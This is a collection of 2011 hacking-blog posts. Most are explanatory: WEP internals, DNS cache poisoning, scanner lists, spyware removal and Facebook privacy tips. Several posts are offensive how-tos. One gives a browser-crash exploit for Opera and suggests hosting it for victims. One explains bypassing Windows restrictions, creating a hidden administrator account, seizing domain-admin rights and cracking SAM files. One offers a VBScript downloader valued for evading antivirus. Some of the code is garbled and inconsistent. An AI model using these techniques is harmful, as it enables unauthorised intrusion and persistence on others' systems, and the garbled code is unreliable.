7001	BEA WebLogic
7002	BEA WebLogic
8000	HTTP Proxy, Alternative HTTP Port, HP Web JetAdmin Version 6.0
8001	BEA WebLogic
Port	Server
8005	Apache Tomcat Administration Server (non-HTTP protocol)
8080	HTTP Proxy, Alternative HTTP Port
8888	HTTP Proxy, Alternative HTTP Port
30821	Netscape Enterprise Server Administration Server

If you know any other ports, please do add them as comment. :)

Check WiFi Network Performance with Qcheck to Help Improve Throughput

2011-11-22T20:12:00.001-08:00

When you buy network hardware, including a hub/router and network cards, you're told that hardware's rated speedfor example, 100Mbps for an Ethernet network, or 11Mpbs for an 802.11b WiFi network.

But those numbers only tell you how your network might perform in ideal conditions; as the saying goes, "your mileage may vary," and it usually does. WiFi networks are particularly finicky and are especially prone to being affected by interference and other factors. Where you place your wireless access point and PCs and how you position their antennas can make a dramatic difference in the actual speed of your network. So, you'll want to know the true connection speed of your network, WiFi networks in particular, so that you can optimize their performance when you troubleshoot them.

But how can you find out your true network performance? If you have a WiFi card, you can find information about your connection by clicking the small network icon in the Notification Area (also called the system tray). When you do that, the Wireless Network Connection Status screen appears.

There's only one problem with that screen: it's highly inaccurate. True, its little green bars and Signal Strength indication give you a broad picture of the relative strength of your network connection. But the Speed indication isn't an actual measurement as far as I can tell; it appears to tell you only your maximum theoretical connection speed, given the nature of your hardware, and doesn't reflect your true current connection speed. When I use my WiFi network, it always tells me the speed is 11Mbps, even when actual, real-time measurement shows my true throughput is less than half of that.

So, how do you measure the true speed of a network in your real-world conditions? Get the free program Qcheck (http://www.ixiacom.com/products/performance_applications/pa_display.php?skey=pa_q_check).

It performs a series of tests, including throughput and response time, and gives you a good snapshot of your network's real performance. When trying to optimize a WiFi network, run Qcheck on each PC on the network to get baseline performance results for each. Then run the test for each PC after you move the base station and PCs, change the positioning of the antennas, and so forth, as outlined in. That way, you'll be able to fine-tune your network for optimum efficiency.

Once installed on every machine in your network, Qcheck measures the performance of the network between any two of your PCs. Qcheck is made up of two components: the console where you run your tests, and an endpoint, which runs invisibly in the background on each PC on which you've installed Qcheck. While the exact metrics vary from test to test, the program works by sending data from one PC to another on your network. The data is then sent from the receiving PC back to the originating PC, and Qcheck measures the round-trip time, calculates throughput, and displays the results.

WEP In a Nutshell

2011-11-14T13:21:00.001-08:00

WEP [Wireless Equivalent Privacy] was meant to be an encryption method to provide security equivalent to a wired access point. WEP was originally designed with 40-bit keys, and later WEP2 came along to increase the key size to 104 bits. At that time, it was the best encryption technology avalable. However with passage of time, it has been proved to be damn vulnerable and hence WPA 2 has holded the position of most secure wifi security technology.

Neways, lets discuss WEP. All of the encryption is done on a per-packet basis, so each packet is essentially a separate plaintext message to send. The packet will be called M.

First a checksum of message M is computed so the message integrity can be checked later. This is done using a 32-bit cyclic redundancy checksum function aptly named CRC32. This checksum will be called CS, so CS = CRC32(M). This value is appended to the end of the message, which makes up the plaintext message P.

Now the plaintext message needs to be encrypted. This is done using RC4, which is a stream cipher. This cipher is then initialized with a seed value, so thta it can generate a keystream, which is just a arbitrarily long stream of pseudo-random bytes. WEP basically uses an initialization vector (IV) for the seed value. The IV consists of 24 bytes of varied bits that is generated for each packet. Some older WEP implementations simply use sequential values for the IV, while others use some form of pseudo-randomizer.

Regardless of how the 24 bits of IV are chosen, they are prepended to the WEP key. The 24 bits of IV are included in the WEP key size in a bit of clever marketing spin. (When a vendor talks about 64-bit or 128-bit WEP keys, the actual keys are only 40 bits and 104 bits, respectively, with 24 bits of IV.) The IV and the WEP key together make up the seed value, which will be called S.

Then the seed value S is fed into RC4, which will generate a keystream. This keystream is XORed with the plaintext message P, to produce the ciphertext C. The IV is prepended to the ciphertext, and the whole thing is encapsulated with yet another header and sent out over the radio link.

When the recipient receives a WEP-encrypted packet, the process is simply reversed. The recipient pulls the IV from the message and then concatenates the IV with his own WEP key to produce a seed value of S. If the sender and receiver both have the same WEP key, the seed values will be the same. This seed is fed into RC4 again to produce the same keystream, which is XORed with the rest of the encrypted message. This will produce the original plaintext message, which consisted of the packet message M concatenated with the integrity checksum CS. The recipient then uses the same CRC32 function to recalculate the checksum for M and checks to make sure the calculated value matches the received value of CS. If the checksums match, the packet is passed on. Otherwise there were too many transmission errors or the WEP keys didn't match, and the packet is dropped.

That's basically WEP in a nutshell. Very soon i would write on What is the Logic when we are hacking a WEP key, which vulnerabilty do we exploit and so on so forth. The tutorial for hacking WEP has already been published by me.Would upload a video very soon too. :)

Have fun, and Enjoy hacking :)

Tool Population For Vulnerability Assessment

2011-11-14T13:09:00.001-08:00

A vulnerability assessment tool or scanner is a tool using which we can automate the process of testing loopholes in a network and immunity of security system implemented by an organization.

They can be classified as :

a. Host

b. Service

c. Application

Host based tools performs scanning on the system they resides on, i.e. they do not interact with any other system. Their advantage include having access to all system resources such as logs, etc. They also work a a faster rate as compared to other assessment tools. However they can also take large amount of host machine’s resources and if this was a important node in the network, this can raise worries on network admin’s face.

Service vulnerability scaners includes tools which scans a range of host or particular services which are running on them. These can include simple port scanners (Nmap, angryip, etc) and they can also include completely automated programs (Acunetix, Nessus, GFI Languard) which can detect live hosts and try to fetch data from them. This automation can be in terms of banner grabbing or service identification as well. These automated tools also enable users to create a report on its own once it completes the assessment.

When we talk about current tool population in the industry, there are a number of tools ranging from scanners to automated ones. Some of them which are open source and available free of cost includes :

Ø Microsoft Baseline Security Analyser ( http://microsoft.com/technets/security/tools/mbsahome.mspx)

Ø Winfingerprint (http://winfingerprint.com)

Ø OpenVas (http:/wald.intevation.org/projects/openvas/)

Ø Paros (http://parosproxy.org)

Ø Win Vuln Scan (http://pspl.com/download/winvulnscan.htm)

Ø Nikto (http://www.cirt.net/code/nikto.shtml)

Ø Nessus

Apart from these tools, you must be in touch with latest vlnerbilty informations. For this purpose you can use these advisories :

Ø http://cert.org

Ø http://cve.mitre.org/cve

Ø http://isc.sans.org

Ø http://owasp.org

Ø http://osvdb.org

Ø http://seclists.org

Ø http://secunia.com

Ø http://exploit-db.com

Getting Rid from Adwares and Spywares

2011-11-14T12:52:00.001-08:00

Do you consider yourself a smart Web Surfer or downloader? Do you consider yourself immune to threat from spywares, known for tracking and monitoring you silently. Then I must say you are not. To support this, let me figure out some points-

1. Most commonly they are installed on our system as a hidden program, behind something legitimate which you had given permission. They may be in form of installation programs, or drive by downloads, i.e. asking you for a plugin in order to view a page.

2. Unlike other programs, these spywares always work in stealth mode so that you can never got to know about the program. You would not even see them in task manager, in add/remove programs, etc.

3. Popups, unwanted websites, unknown errors, slower pc, are very clear indication of spywares.

Guess why someone would create adware or spywares? A simple thought, they can send you unwanted ads for which they can be paid by the companies thy advertise for, or they can report your name, email address, and other information to a survey company.

Now lets talk about the removal of adware. The methodology which most of the adware/spyware removal tools use is similar to antiviruses. They also maintain a library of spyware filenames and registry keys and then searching and removing them from systems.

However the first thing I would suggest you to install is a firewall so that no one can get access to your system. This would even work in the case when your system is already infected. In fact most of the operating systems nowadays comes with default firewalls within them. Some other firewalls that may of your interest are :

a. Zone Alarm [http://www.zonealarm.com]

b. Sygate Personal Pro [http://www.tucows.com/thankyou.html?swid=213160]

c. Kerio Personal Firewall

d. AVG Internet Security Firewall [http://www.avg.com/us-en/home-small-office-security]

But again I would say that getting a good firewall do not ends the story. Its just a part of solution. Besides frewalls, you must also use one or more anti-spywares to check your system for current infections. As an add-on safety, I would recommend you o use spyware removal tools to make your system more infection free. These all are useful for this task:

a. Spybot [http://spybot-virus-scan.com]

b. Webroot Spy Sweeper [http://webroot.com/wb/products/spysweeper]

c. Spyware Doctor [http://pctools.com/spyware-doctor]

d. Bazooka [http://www.kephyr.com/spywarescanner]

e. Hijack This [http://spychecker.com/program/hijackthis.html] [Advanced Users]

Some of them can even deal with the things in which antiviruses do not takes interest. These things include ad-ware, Trojans, key loggers, track wares, etc. Along with scanning part, they would tell you how to uninstall them these potentially unwanted apps, and that’s too with step by step instructions.

I assures you going ahead with this procedure will simply make you immune to spyware and ad wares, apart from your expertise in web surfing.

Opera 11.11 Crash Vulnerabilty Discussion

2011-11-14T12:40:00.001-08:00

Opera 11.11 Web browser , which is vulnerable to DOS, and can be used to crash it down remotely. The trick lies in refreshing/ reloading an IFRAME and then putting an infinite loop on some of its element. For this time we are going to use Font element.

So open up your Opera and load the exploit [which is in an HTML file] into it. You can get the exploit code from here.

Save this text in form of a HTML file. When we open this file in opera, goes up and crashes it down within a fraction of seconds. The best part of this exploit is, you can also crash an Opera remotely, say uploading our file to any of the free web hosting sites and then asking someone to open it. Doing so would crash his opera down.

Anyways, lets discuss the code.

<html>

<body>

var a = window.document.getElementById('bo0om');

var b = a.contentDocument.createElement('font');

a.src='about:blank';

setTimeout('b.face = "h3h";',100);

script>

body>

html>

As you can see, we had taken an iframe with id =bo0om with no source code, no height and no width.
2.

var a = window.document.getElementById('bo0om');

Then we took a variable ‘a’ and loaded the iframe into it.

var b = a.contentDocument.createElement('font');

Taking ‘a’ into ‘b’, i.e. whole iframe into ‘b’ and then adding an element font which I fiscussed in the very first paragraph of this article.

4.

setTimeout('b.face = "h3h";',100);

Now setting the timeout to be 500ms, we are asking our page to load “h3h” into font element of iframe bo0om, (b.face or we can say a.font.face or ultimately bo0om.font.face= ‘h3h’).

Now the point is, this whole code is going to do the same amount of work in an infinite loop and thus and opera will continuously keep doing this. Due to the memory it would consume in performing this all, it crashes.

This is the Error report I got in on my screen. You can get some difference.

http://localhostr.com/file/1Tq9Ti9/crash20110928182514.txt

Small Discussion on DNS Security

2011-09-23T03:25:00.000-07:00

You might have heard of DNS Attack, DNS spoofing, etc many times. So here i am going to discuss a general DNS Security case sttudy.

DNS cache poisoning (also known as DNS cache pollution) is a maliciously created or unintended situation that provides data to a Domain Name Server that did not originate from authoritative DNS sources. It occur if DNS "spoofing attack" has been encountered. An attacker will send malicious data / non-secure data in response to a DNS query.

For the simplest scenario, a cleint sends DNS server a question , "What is the Ip adress of Hackplane.in" ?

Now DNS server gives it the answer. if the answer matches the question, the client will trust that it had got a right answer.

BUt here it must be noted that there are various ways in which this process can be intercepted or changed or impersonated so that wrong answer can be given and thereby making client go for something wrong.

Here i am attaching an image for better understanding of this concept.

Click On the Image for Enlarging. :)

Now How does one spoof a response.

1. A question is sent by the cleint and then it waits for the answer.

Well, the question arises that how the client is gonna trust the spoofed answers. So there are someof the attributes by which t identifies it.
a) It comes back to same ip it was sent from.
b) It comes to the same port number it was sent from.
c) Answer mathces the asked question.
d) A uinque transaction number.

In order to spoof a message we need to find out all these attributes. We need to have the Ip Address of recursive name server, question whichh the cleintsend, so as to inject the answer, the port number, and the uninque sequence number. What clicks my mind for all this informaiton is WIRESHARK. :P

Now Whats new??

Dam kaminsky identified that there is a way by which we can directly flood the recursivve server with lots f answers so that a right combination may go in a hit. (But actually it would not take a long time, so dn start putting on ur brains).

Now if the Name server deals with authoritative as well as recursive responses, any such attack can store bad data and that may be forwarded to lame computers that want authoritative responses.

For somehow controlling this:-
1. Sequence numbers must be randomized with a greater frequency.
2. Recursive name servers must be disabled (and if not disabled, must be restricted to only required number of users).
3. Diffrent Port numbers(apart from 53, default one fixed by IANA) must be used.
4. More emphasis on encrypted data must be laid on.
5. DNS SEC (DNS Security policy must be used).

For a clear logic, jst cop up with the folllowing if else statment.

If DNS is not recursive, it is safe.
If DNS is recursive, then if it provides good randomness or sequence numbers, then it is OKAY ( A mid position, neither too secure nor too vulnerable).
If DNS is not recursive as well as it do not provide good randomness, it is highly vulnerable.

Enjoy Hacking. :)

Diffrent ways to Access Command Prompt

2011-09-16T22:59:00.000-07:00

This article is about hacking networks. Since any longer than five minutes, you risk getting caught, this is *hopefully* going to teach you how to get root in five minutes or less. So, lets get it started.

To those of you that think by getting root, you own everything, sorry to disapoint you. But, by getting root, you only own the comp your on. There is however, a way to get domain root, which I'll discuss later.

So first of all , try and check your access to DOS. For doing so :
"start>all programs>accessories>cmd" or "start>run> type in 'cmd'"

If it doesnt works, go and make a file named "whatever.txt" Right click, and open it in notepad. Type "cmd" in it and save, if you are able to see some black screen fr a second, yes, you can get it. Now change the content in file, i.e 



replace "cmd" with following:

 @echo off
 echo hello
 pause

If you see "HACKED" on the screen, then yes you are more closer. Finally now change the content to following :

REGEDIT4 

[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldApp] 
 "Disabled"=dword:0 
 [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem]
 "DisableRegistryTools"=dword:0

This changes the registry value that blocks dos. So, type "cmd" in the .bat and see if it works. If that also didn't work, theres still other ways.

Now, type in your commands and click "file>save as>" for the type, put "text document, and save as "anything.bat".
If that wasn't the reason, I hope you have access to the C drive.
If you do, go here "C:\Windows\system32\" and create a new folder.
Now, find "cmd.exe" and "scrnsave.scr" and copy them to the new folder.
Goto the folder and rename "scrnsave.scr" to "scrnsaveold.scr", and "cmd.exe" to "scrnsave.scr" And replace it with the real one in system32. Now the next time your screen saver appears, it will be full access dos. So, if you can, on the desktop, right click and select properties. Change the time to one minute. On windows xp, you may have to make sure the screensaver is "scrnsave".

Even if it doesnt works, you can go for control panel. yes this one is not gauranteed, but ya at least it may be try at least.



Just create a new folder and rename it to following(obviously only the {} part)



Control panel: {305CA226-D286-468e-B848-2B2E8E697B74}

Printers: {2227A280-3AEA-1069-A2DE-08002B30309D}

Taskbar and startmenu: {0DF44EAA-FF21-4412-828E-260A8728E7F1}

Microsoft FTP folder {63da6ec0-2e98-11cf-8d82-444553540000}

Temporary Internet files {7BD29E00-76C1-11CF-9DD0-00A0C9034933} 

ActiveX Cache folder {88C6C381-2E85-11D0-94DE-444553540000

Subscblockedriptions folder {F5175861-2688-11d0-9C5E-00AA00A45957}

 Dial-up networking: {992CFFA0-F557-101A-88EC-00DD010CCC48} 

Scheduled tasks: {D6277990-4C6A-11CF-8D87-00AA0060F5BF} 

Folder options: {6DFD7C5C-2451-11d3-A299-00C04F8EF6AF} 

Dial-Up Networking: {992CFFA0-F557-101A-88EC-00DD010CCC48} 

Scheduled tasks: {D6277990-4C6A-11CF-8D87-00AA0060F5BF} 

History {FF393560-C2A7-11CF-BFF4-444553540000}

Another way to get dos, is to create a prog. Uber0n has created such a program. You can find it at http://www.freewebs.com/uber0n/ You'll need a c++ compiler.

If so far, nothing has worked. You need to crack the sam file. Pretty sure Cain & Abel has this option.

If you did get dos, it's time to create yourself an admin acct. Type this.

@echo off

net user hackplanet hackplanet /add

net localgroup administrators hackplanet /add

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v hackplanet/t REG_DWORD /d 0

First Line just hides the file address and stuff.
Second Line Creates the user "hackplanet" with the password of "hackplanet".
Third Line adds "upgoingstar" to the administrators group.
Fourth Line makes the acct "upgoingstar" a hidden acct.
If you see "The command completed successfully." or something similiar, congragulations. You now have root. If it didn't work, it means you have limited access dos, use the screensaver thing.

If you want domain root, you can either find the domain admin's username and type



@echo off
 net user [username] [newpassword]

That will change the pass.
Or, if you can get on his/her comp, type this in dos.



net group "Domain Admins" [username] /add

This will add an acct to the domain admins.

Moreover, if you don't have access to the C drive, or any other particular drive, there are a few ways to view it's contents. You just need to be able to install programs. Google has a program called "Google Desktop" which indexes the computer and makes it searchable.
Or, you can download a web browser such as Opera. In the url bar type this "file://" you should now see a list of drives.

Seems funny? Weel, actually it is. :)

Neways, this much fr now. Enjoy Hacking, enjoy hackplanet. ;) :-@

CMS Explorer : Reveal CMS Components out of the Site

2011-09-11T00:14:00.000-07:00

CMS Explorer is basically used to find out and thus reveal the different modules, plugins, components and themes a particular CMS based site is using.

Moreover, CMS Explorer can be used as an effective tool in security testing. However it is not having any kind of specific thing targeted to Security Checks, but yeah, The "ExplorE" options can be used to find out the hidden or library files that can never be accessed by the normal web clients. The whole process includes retrieving the current source's hierarchical sturctur, followed by the request for fnding the file names from the target system. These requests are sent by some specific proxy and thus can be used any further in the tools like Web inspect, Burp, etc..

It currenty supprts module/theme discovery with the Drupal, Wordpress, Joomla, Mambo.

Drupal and Wordpress can be explored further as well.

Options :

This explorer is designed to reveal the the specific modules, plugins, components and themes that various CMS driven web sites are running.

Additionally, CMS Explorer can be used to aid in security testing. While it performs no direct security checks, the "explore" option can be used to reveal hidden/library files which are not typically accessed by web clients but are nonetheless accessible. This is done by retrieving the module’s current source tree and then requesting those file names from the target system. These requests can be sent through a distinct proxy to help "bootstrap" security testing tools like Burp, Paros, Webinspect, etc.

CMS Explorer can also search OSVDB for vulnerabilities with the installed components.

CMS Explorer currently supports module/theme discovery with the following products:

Drupal

Wordpress

Joomla!

Mambo

And exploration of the following products:

Drupal

Wordpress

In order to install it, first of all Unpack the Archive, Then Create a file "osvdb.key in the CMS explorer directory, and the put the OSVDB key at the first line. :)

You can also run " ./cms-explorer.pl" to ensure that no errors are coming.

Usage :

In order to use CMS Explorer, You had to at least specify the url to "ROOT" of the CMS along with the type of that CMS. So, why ROOT? basically ROOT is the base \URL of any kind of CMS. For an instance, root level of Wordpress are wp-content and wp-admin directories.

In case you specify an incorrect root level, one which actually doesnot exists at all, CMS epxlorer would not stop :P. In fact it would keep running but however with no results.

Options / Swicthes :

bsproxy (requires value): The proxy to route any found files through. Format can be like 'http://host:port/', 'host:port' or just 'host'. If port is not specified, the default is 80.

explore: Look for additional theme/plugin files. Only supported for Drupal and Wordpress.

osvdb: Check osvdb.org for vulnerabilities in the installed components. Requires an API key be in a file called osvdb.key.

plugins: Look for plugins/module/component files. By default this is enabled and both plugins and themes will be checked.

pluginfile+ (requires value): Alternative plugin file list.

proxy+ (requires value): Proxy for base requests. Format can be like 'http://host:port/', 'host:port' or just 'host'. If port is not specified, the default is 80.

themes (requires value): Look for themes. By default this is enabled and both plugins and themes will be checked.

themefile+ (requires value): Alternative theme file list.

type+ (required, requires value): The CMS type to be tested: Drupal, Wordpress, Joomla/Mambo.

update: Update the default lists from Wordpress and Drupal. This over-writes the current files with fresh copies.

url+ (required, requires value): Full URL to application's root directory (where the CMS is installed)

-verbosity+ (requires value): 1-3 in increasing levels of output.

Test for Wordpress plugins and themes against hackplanet.in, explore for additional files. Route all "found" items using the bootstrap proxy running on port 8080 of localhost.

perl cms-explorer.pl -url http://hacklpanet.in/ -v 1 -bsproxy localhost:8080 -explore -type wordpress

Port 8080 can be something else as well, so on the basis of scanning and your observations regarding the ports, give it as "localhost:portnumber" . :)

By the way, lets be ready to have fun.

Download It Here :)

Other Required Things.

Getopt::Basically a Long perl module

LibWhisker (LW2) included, or Download from http://www.wiretrip.net/rfp/lw.asp.

OSVDB API Key (optional): http://osvdb.org/api/about.

Retreive External files Via HTTP using WHS Scritps

2011-08-13T07:17:00.000-07:00

Sorry guys for being this much late in writing this blog entry. Was busy with lot of stuffs in between and was feeling bad. Anyways, starting with WHS scripts, and would keep on writing abou more things which i had learnt in between these days.

Windows Script Host (WSH) is a scripting environment developed by Microsoft
for automation of tasks in the Windows operating system. It has been used extensively by
Windows system and network administrators. WSH scripts have also been shipped by
Microsoft as an integral part of various Windows operating systems and products such as
the IIS web server. In contrast to well-known hacking tools, text based WSH scripts are
less likely to be flagged by signature based virus scanners as malware—a desirable
attribute for an attacker trying to avoid detection.

The following script utilizes the XMLHTTP COM object (Microsoft), which is
present on most Windows systems, to download files via the HTTP protocol. This can be
a useful tool to retrieve binaries since firewall rules usually permit inbound HTTP traffic.

' XmlHttpGetBinary.vbs
' This script invokes the XMLHTTP object to download the file specified
' in the URL passed on the command line and saves it to the specified
' file name.
dim XmlHttp, Args, StdOut, URL, FileName, AsynchRequest, OutputStream
const BINARY_STREAM_TYPE = 1
const CREATE_OVERWRITE_SAVE_MODE = 2

set StdOut = WScript.StdOut
set Args = WScript.Arguments
if Args.Count <> 2 then
StdOut.WriteLine "Usage: xmlhttpGetBinary "
WScript.Quit
end if
URL = Args.Item(0)
FileName = Args.Item(1)
set XmlHttp = WScript.CreateObject("MSXML2.XMLHTTP")
set OutputStream = WScript.CreateObject("ADODB.Stream")
AsynchRequest = false
XmlHttp.Open "GET", URL, AsynchRequest
XmlHttp.Send
OutputStream.Type = BINARY_STREAM_TYPE
OutputStream.Open
OutputStream.Write XmlHttp.responseBody
OutputStream.SaveToFile FileName, CREATE_OVERWRITE_SAVE_MODE
OutputStream.Close
StdOut.Close
set XmlHttp = nothing
set AsynchRequest = nothing
set OutputStream = nothing

In Order to compile these scripts,we need WSH Interpreters. here i amwriting a little overview of WSH Interpreters.

WSH can be run in protected-mode using the Wscript.exe interpreter (typically

used for scripts that require user interaction via popup dialog windows) or in real-mode

using the command line Cscript.exe (Microsoft, 2007). Unless otherwise noted, scripts

mentioned in this paper are intended to be executed via the command line Cscript.exe

interpreter.

WSH scripts are written in either JScript or VBScript as uncompiled text files

with extensions of “.js” or “.vbs” respectively. The Microsoft TechNet

(http://technet.microsoft.com) and MSDN (http://msdn.microsoft.com/) sites provide

extensive documentation and examples of WSH scripting.

Tools to prevent data loss

2011-05-24T02:56:00.000-07:00

Data loss refers to unexpected loss of data or information and therefore backup and recovery of data must be developed to restore the lost data.

Here I am including some of the best tools to prevent data loss :

Security platform: BorderWare security platform removes the need for deploying a new device to protect against new messaging applications by integrating email, IM , web security with a single policy and single security system. It is actually a monitoring and filtering tool which prevents data leakage.

Check Point Software: Pointsec data encryption solutions by check point provide data protection on laptops, PCs, mobile device, and removable media. By leveraging a strong and efficient blend of full disk encryption, access control, port management, removable media encryption , it delivers a comprehensive data security.

Cross Road Systems – DBProtector : it provides database security at a logical business policy level and stops “authorized misuse” of database information. DBProtector provides policy-based intrusion detection, prevention, and compliance auditing.

Device Wall : it prevents the transfer of files to or from unauthorized portable devices. It also automatically encrypts data copied to approved devices. Moreover it also provide complete audits trails of device and file access.

Exeros Discovery: Exeros discovery software automates discovery and maintenance of business rules, transformations, hidden sensitive data, and data inconsistencies across structured data sources. It uses a unique technology of data driven mapping to replace the traditional manual process of analyzing source data and mapping it to another dataset.

Procurve Identity Driven manager : Procurve Identity Driven Manager configures security and performance settings based on system, user, device, location, time, client system state. It enables us to to be able to centrally define and apply policy-based network access rights that allow network to automatically adapt to needs of users and devices as they connect.

Event Tracker: being my favorite event tracker is solution that features real time collection of all logs, secure, tamper-proof and encrypted log storage, and real tie slog analysis, and reporting as well.

Verdasys’ Digital Guardian is a data security solution for protecting and tracking the flow of critical data. Digital Guardian logs user data transactions and applies predefined rules to ensure that end users are using applications and data properly.

Websense Content protection suite: This package is a comprehensive solution to address the growing need for robust information leak prevention. It provides superior protection to secure and manage , who, what, how and where.

Elcomsoft Distributed Password recovery: Elcomsoft password recovery is a password recovery tool , as it suggests from its name ;) . It is used to crack complex passwords, recover strong encryption keys, and unlock ducuments in a protected environment. It is a high end solution for forensic and government agencies, data recovery, and password recovery services.

Some questions to be answered during Malware Analysis

2011-05-16T23:18:00.000-07:00

Analysis means to study something. And so , the Malware analysis can be defined as "taking the malware apart to study it". While studying malware, our purpose must be to answer some of the questions. These questions may be classified into two groups. One, consistig of "bussiness questions" and other including "technical questions".

Bussiness questions may include the following key questions :-

What is the purpose of malware?
How to get rid of that malware?
How did it get there?
Who may be targetting us?
What did they steal?
How long it has been here and infecting us?
Does it spread on its own?
How to find it on other machines?
How to prevent this to infect us any further?

Same way, technical questions may be listed as follows :-

What network-based indicators can reveal the presence and activity of malware?
What host-based indicators can reveal the presence and activity of malware?
Is the malware persistent? What is the mechanism to keep it running after rebooting of machine?
Is the program based on some other tool?
Malware is written in which language?
When the program was written, compiled and installed?
Is the program packed? Which packer is used for this purpose?
Does the program has any anti-debugging functionality?
Doest the program include any rootkit?
These were some of the questions that may help you to reach some conclusion in ur "malware analysis" if answered.

Hope this wud help you somehow. Have fun. Enjoy HaCKING, Enjoy HaCKTON.

Enable/Disable Button Scam Spreading on facebook

2011-05-16T09:29:00.000-07:00

Researchers from Sophos have spotted a currently circulating “Enable Dislike Button” Facebook scam.
Upon clicking on the what looks like a recently added genuine Facebook feature, users are exposed to a “Follow the steps below to get the Dislike button” instructions page similar to the one seen in the Osama Execution Video Scam.

Spamvertised as:

Facebook now has a dislike button! Click ‘Enable Dislike Button’ to turn on the new feature!

Once the users copy and paste the obfuscated javascript in their browsers, all of their friends will be spamvertised with a wall post about the non-existent Dislike feature. The campaigners appear to be monetizing the campaign through a survey scam.

For the time being, Facebook doesn’t offer a dislike button.

And for any such confirmation, visit official facebook blog sites rather then believing the general people.

How to be safe on Facebook in times of spams.

2011-05-16T09:27:00.000-07:00

In this time of increasing frauds, spams and hacks going on, how could facebook (world's second m,ost used website) be spared. You can see some new spam or hack methodology coming out everyday and compromising accounts of lame people. For those who are noobs to such things, there are some of the settings which must be implemented in order to be safe from such stuff. here are some of those settings.

1. Who can see what?

Your first stop should be your privacy settings, which you can get to under "Account" at the top right of any page.
Here, make sure you're using a set of custom settings. Click "Customize settings" under the grid on that page to see who can see which parts of your Facebook profile.
Unless you use your Facebook account as a public page, every option should at least be set to "Friends Only." From there, you can make each setting more specific, keeping your photos hidden for certain people, for example.

2. Place your friends in lists

To make the previous tip more powerful, place your Facebook friends in lists. If you begin to define lists such as Coworkers, Best Friends, Employees, Students, etc., you can set each of your settings to be visible or not visible to a whole list of people.
To do this go to "Edit Friends" under the Account menu. Type in a friend's name and add it to a list.
Then you can make sure that only your best friends, for example, can see the photos you post. Or you can make sure that your students or employees don't see your status updates.
You can also add a friend to a list as you accept their friend request.

3. How secure is your password?

This is the front line to your Facebook security and should be taken seriously. Good passwords include capital letters, punctuation, numbers and words that can't be found in the dictionary.
Resist using anything that someone who knows you well enough could guess (kids, pets, phone numbers, etc.).
If you think for any reason that your account's security has been breached, change your password immediately. Doing so will end every active session of Facebook for your account, locking out anyone else but you.

4. Who can find you?

Facebook also allows you to set what people see if they're not your friend. Under privacy settings, click "View Settings" under the "Connecting on Facebook" setting at the top of the page.
Here, you can set what people see when they search for you on Facebook.
Pay special note to the bottom option, which allows you to set who can see what you have "liked" on Facebook. Many don't realize that by default this option is set to show everyone on the Web what you like.
Don't want that future employer to know that you "like" naps or skipping class? This is a good thing to check.

5. What does my profile look like to Grandpa?

Even the most conscientious Facebook user can miss a check box or two, putting his or her entire weekend escapade on Facebook for Grandpa to see.
But the good news is that you can preview what your profile looks like to any of your friends, many of whom can see different things depending on how advanced you have set your privacy settings.
In your privacy settings, click "Customize Settings" then "Preview My Profile."
Here, you'll be able to type in any friend's name and see exactly what they see. Very handy.

6. Browse Facebook securely

One of Facebook's most vulnerable features is that much of your browsing is done without a secure connection to the Web site. Hackers have exploited this hole by accessing your personal information if you use Facebook on a public or unsecured WiFi network.
In your account settings, choose Account Security. There's a check box there to enable secure browsing whenever possible. Check that.
You'll soon see that Facebook will be using https:// instead of http://. That's how you know you're more secure.

7. Who is logging in as you?

One of Facebook's greatest security features is the ability to individually approve each computer or mobile device that logs into your account.
You can name each computer you use Facebook with (work, home, laptop, iPhone, etc.).
To turn this on, go to your account settings, click on "Account Security" and choose that you want an e-mail or text message when someone tries to log in from a computer that isn't one you've approved.
Here, you can also see all the open sessions of Facebook tied to your account. Someone logging in from five states away? Click "end activity" and they'll be stopped in their tracks.

8. Which apps know you?

As we have used Facebook over the years, each of us has amassed lists of applications that have access to our Facebook information.
To see which apps currently have access to your Facebook information, go to your privacy settings and click edit under "Apps and Websites" at the bottom left of the page.
On the next page, click edit settings next to "Apps you use."
Here, you'll see a list of all the apps that have your information on file. Many of them are used for convenience, such as integration with the popular Instagram photo-sharing app or commenting services on news Web sites. But there are certainly some you could lose.
Click the X next to any app from which you want your information yanked.

9. Even your friends' apps know you, too

This one is even scarier. On the same app privacy page, check out the subhead that says "Info accessible through your friends."
You may not know it, but anything your friends can see on Facebook can also be seen by any app that your friends add on Facebook — including apps that you have no idea were ever given access.
To disallow this, click on edit settings and uncheck all the boxes that allow you to choose what can be shared with apps that your friends add. Click save.

10. Who can post on your wall?

Many of these spammy links are clickjacking schemes, which spread by posting links on a bunch of your friends' walls.
The only foolproof way to prevent these links from gumming up your own wall is to set it so no one can post directly on your wall. Friends can still comment on your status messages, links and photos, but won't have the ability to leave you a public note.
To change this setting, head to the customize settings area under privacy. Then uncheck the "Enable" box where it allows friends to post on your wall.

General Advice For Improving RAM performance

2011-05-11T09:14:00.000-07:00

So, guys going a l'l bit away frm leak, this time related to system performance rather than some hacking stuff :)

As far as performance of RAM is concerned, here are some of the additional tips for making better
use of your existing RAM:

Remove DLLs from cache memory
If you notice your system running slowly after Windows has been running for some time, or if your
RAM seems to be getting low for some reason, the culprit might be left-behind DLLs from programs
that are no longer running, but that Windows still keeps in memory. Sometimes Windows keeps
DLLs in cache memory even when the program that required them is no longer running, and this
cuts down on the memory available to other applications.

You can use a simple Registry hack to have Windows automatically remove from cache memory
DLLs that are no longer needed by programs. Run the Registry Editor [Hack #183] and go to HKEY_
LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer. Create a new DWORD value
named AlwaysUnloadDll, and give it a data value of 1. Exit the Registry, and reboot for the new
setting to take effect. Note that this setting might cause problems with some programs. Some
Windows programs—especially older and 16-bit programs—can issue error messages with this
setting in effect, so if that starts happening, delete the new key, or give it a value of 0.

Avoid DOS applications
DOS applications may not allow Windows to manage memory properly, and they hold on to the
memory they use, not allowing it to be swapped out for use for other programs or processes. If you
use any DOS applications, replace them with Windows versions.

Disable Aero
If you’re using Aero in Windows Vista, turn it off. Right-click the desktop, and select Personalize.
Then choose Window Color and Appearance→“Open classic appearance properties” for more color
options. Select a non-Aero theme, and click OK.

Reduce the applications and services running in the background
You might have many programs and services running in the background, without realizing it. Look at
your Notifi cation area, and see if there are any programs running that you don’t require. Shut them
down, and go into their confi guration settings to make sure they don’t load at startup.

Running Auxiliary Modules Against Multiple Hosts in a Sexy Manner

